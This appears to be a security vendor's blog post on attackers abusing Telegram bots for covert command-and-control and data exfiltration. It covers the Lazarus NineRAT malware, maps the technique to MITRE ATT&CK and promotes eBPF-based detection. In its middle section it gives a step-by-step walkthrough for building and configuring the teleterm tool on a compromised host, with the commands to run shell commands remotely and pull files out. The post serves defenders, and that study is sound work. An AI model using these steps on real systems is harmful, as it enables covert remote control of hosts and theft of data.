In recent years, there has been a significant increase in adversaries exploiting popular messaging apps such as Telegram, Discord, Signal, and others to conceal their malicious activities. Among these platforms, Telegram stands out due to its robust security features, including end-to-end encryption and anonymous account creation, making it a go-to tool for cybercriminals.
Overview
Most recently, Telegram founder and CEO Pavel Durov was arrested in France over allegations that the platform is being used for illicit activity. The Paris prosecutor’s office claims Durov was detained as part of a judicial inquiry opened in July involving 12 alleged criminal violations, including complicity in selling child sexual abuse material and in drug trafficking, fraud, abetting organized crime transactions and refusing to share information or documents with investigators when required by law.
Telegram responded to the arrest, saying it upholds EU laws and performs content moderation “within industry standards and constantly improving.”
In this article, we will examine how Telegram is used by cyber criminals to perform illicit activities such as establishing covert Command and Control (C2) channels, executing data exfiltration, sharing intelligence, and delivering malicious payloads, all while maintaining operational stealth and evading detection by conventional security measures.
Lazarus APT Telegram-Based Malware “NineRAT”
Lazarus, a highly sophisticated North Korean APT group, has increasingly employed innovative and unconventional tactics to enhance the stealth and effectiveness of its cyber operations, including through Telegram. In their recent “Operation Blacksmith” campaign, which exploited the Log4Shell vulnerability, they deployed NineRAT – a remote access Trojan first identified in March 2023.
Notably, NineRAT utilizes Telegram as its Command-and-Control (C2) channel, a strategic decision capitalizing on Telegram’s robust encryption, and its reputation as a trusted communication app. By embedding their C2 communications within Telegram traffic, Lazarus effectively conceals their malicious activities within legitimate traffic, complicating detection efforts by conventional security measures. This approach significantly enhances their ability to evade detection, bypass security mechanisms, and maintain persistent over compromised systems, underscoring the group’s sophistication in cyber operations.
The Attack Flow
- The attacker sets up a Telegram account and a bot and prepares a designated Telegram C2 Malware.
- The attacker gains initial access to the target after exploiting a vulnerability.
- The attacker deploys the Telegram C2 Malware on the target to communicate with his Telegram bot.
- Communication is established between the compromised target and the attacker bot via Telegram API.
- The attacker issues commands to the target using his Telegram bot via Telegram API.
- The commands are transmitted via Telegram API to the compromised target and executed.
By following this attack flow, the traffic is encrypted and disguises its maliciousness and source, making it look legitimate.
The Exploitation Phases
Imagine an attacker has gained initial access to your host and aims to establish a covert command and control (C2) channel. The attacker’s objective is to maintain persistence on the compromised host, execute commands, perform data exfiltration, and disguise his communication to appear legitimate to conventional security products, all while preserving anonymity. To achieve this, the attacker can exploit Telegram for stealthy communication and data exfiltration and to accomplish this, the attacker will need to perform several actions, which are listed below.
Setting up a Telegram Account & Creating a Bot
The attacker will need to set up a Telegram account & a bot using the Telegram BotFather service with the command /newbot and follow the instructions. Once the bot is created, he will get a unique API token that will be used to interact with Telegram API and communicate with his bot.
Deploying C2 Telegram-Based Malware That Will Communicate with Telegram API
To deploy his C2 malware, he can write a designated Python script or use already written open-source tools such as teleterm (Telegram Bot Exec Terminal Command) to establish stealth communication with his chatbot and execute commands on the compromised host (make sure Go ^1.18, gcc & git are installed). Once installed, he can modify the .teleterm/config.yaml file to include his unique Telegram API token.
# git clone https://github.com/alfiankan/teleterm
# cd teleterm/
/teleterm# go build -o teleterm-bin ./cmd...
/teleterm# ./teleterm-bin fresh
# nano /root/.teleterm/config.yaml
----------------------------------
teleterm:
telegram_token: "xxxxxx" # --> API Token
shell_executor: "/bin/bash"
whitelist:
- <USER_ID> # --> User Chat ID
execution_timeout_second: 10
# Press Ctrl + X (to save & exit)
----------------------------------
/teleterm# ./teleterm-bin &Copied
Executing Commands on the Compromised Host with the Telegram Bot
The attacker can now use the teleterm program by running ./teleterm-bin & on the compromised host to run it in the background and execute commands from his chatbot using the command /run with the desired bash command as an argument. Note that the teleterm program will also allow you to pre-configure commands for the bot so you won’t have to write it again and again, you can do so by using the command /addbutton <button_name>!!<command> (e.g./addbutton ping!!ping 8.8.8.8) then run it with /run ping.
teleterm will execute the commands on the host and send their output to the attacker’s Telegram bot via Telegram API. Once his C2 channel is established, he can now also look for sensitive files and exfiltrate data from the compromised host using the command /getfile, all while remaining anonymous and undetected due to the use of Telegram API, the traffic’s legitimate appearance and lack of monitoring.
Compromised Target – Installation of Telegram-Based Malware
Telegram Bot – Executing Commands
MITRE ATT&CK® Techniques
Adversaries leveraging Telegram’s API for C2 operations and data exfiltration align with MITRE sub-technique T1071.001 by embedding their malicious communications within legitimate web protocols, blending seamlessly with regular encrypted traffic to avoid detection and with MITRE technique T1567, as attackers use Telegram, a widely trusted service, to exfiltrate data, exploiting the platform’s legitimacy to bypass security measures and remain undetected, blending within normal network traffic.
T1071.001: Application Layer Protocol – Web Protocols
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection or network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
T1567: Exfiltration Over Web Service
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them before compromise.
Advanced Runtime Threat Detection with eBPF
When analyzing the network traffic, requests originating from a host and directed toward the API of a messaging app, such as api.telegram.org, can serve as a strong indicator of potential malicious activity. This traffic pattern may suggest that the host is utilizing Telegram’s API for command and control (C2) operations or data exfiltration. By closely examining these requests, security analysts can identify and correlate suspicious communication behaviors and uncover sophisticated threats that might otherwise evade detection by blending into legitimate traffic.
To detect this kind of activity, Upwind provides the following coverage by leveraging eBPF technology:
- Upwind’s eBPF sensor will detect the installation & compilation of suspicious scripts, tools, or apps on the monitored host.
- It will also detect their execution on the process level.
- The Upwind sensor will detect out-of-baseline events, such as unexpected processes or network communications occurring on a host by learning and understanding the normal processes and communications that usually occur on the host and analyzing what is unusual or unexpected.
- The Upwind sensor will constantly monitor the network traffic in real-time and alert on suspicious communications to and from the host, such as calls originating from the host to messaging apps APIs such as Telegram, Discord, Signal, and more.
Any suspicious process or network communication is then surfaced to the Upwind’s Threats Module, providing the customer enhanced visibility over their processes, network traffic, and threats. In the below example, you can see how an attacker would exfiltrate a secret file using a simple curl request to Telegram API.
This would be automatically detected by the Upwind sensor, as shown in the example below.
By leveraging eBPF technology and implementing multiple security layers to safeguard an organization’s assets, Upwind provides full coverage of the system behavior and real-time threat detection and response, allowing you to neutralize threats the moment they emerge.
Learn More
To learn more about how Upwind protects against network threats such as suspicious communications with messaging apps APIs and more, visit the Upwind Documentation Center or Schedule a Demo.
